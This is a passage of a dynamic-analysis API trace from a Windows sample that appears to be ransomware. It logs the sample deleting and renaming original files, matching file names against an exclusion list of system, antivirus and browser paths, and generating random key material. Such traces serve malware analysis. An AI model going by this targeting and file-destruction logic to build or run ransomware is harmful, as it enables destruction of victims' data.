shared\\ink\\fsdefinitions\\main\\base_jpn.xml")) returned 0x20 [0157.040] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml", dwFileAttributes=0x20) returned 0 [0157.040] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 1 [0157.040] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml")) returned 0 [0157.040] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" [0157.040] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main") returned 1 [0157.041] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD8A3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd8a3.tmp")) returned 0xd8a3 [0157.041] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD8A3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd8a3.tmp"), dwFlags=0x1) returned 0 [0157.042] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\.xXD8A3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\.xxd8a3.tmp")) returned 1 [0157.042] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0157.042] wcslen (_String="OK") returned 0x2 [0157.042] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.042] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.042] CryptDestroyKey (hKey=0x9ad338) returned 1 [0157.042] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0157.042] CryptReleaseContext (hProv=0x8e3908, dwFlags=0x0) returned 1 [0157.042] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*NMCRYPT") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*Recovers your files.html") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*.exe") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*.dll") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*.lnk") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*.bat") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*.ini") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*.msi") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*.scf") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*pagefile.sys*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*NTUSER.DAT*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*AppData*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*\\winrar\\*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*\\java\\*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*\\windows\\*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*\\ESET\\*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*\\AVG\\*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*\\AVIRA\\*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*Atheros*") returned 0 [0157.042] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*Realtek*") returned 0 [0157.043] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*bootmgr*") returned 0 [0157.043] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*boot*") returned 0 [0157.043] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*boot*") returned 0 [0157.043] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*CONFIG.SYS*") returned 0 [0157.043] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*IO.SYS*") returned 0 [0157.043] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*MSDOS.SYS*") returned 0 [0157.043] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*NTDETECT.COM*") returned 0 [0157.043] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*ntldr*") returned 0 [0157.043] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*chrome*") returned 0 [0157.043] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*opera*") returned 0 [0157.043] PathMatchSpecW (pszFile="base_kor.xml", pszSpec="*firefox*") returned 0 [0157.043] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml", pszSpec="*") returned 1 [0157.043] strlen (_Str="NMoreira") returned 0x8 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.043] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.044] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.045] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.046] CryptGenRandom (in: 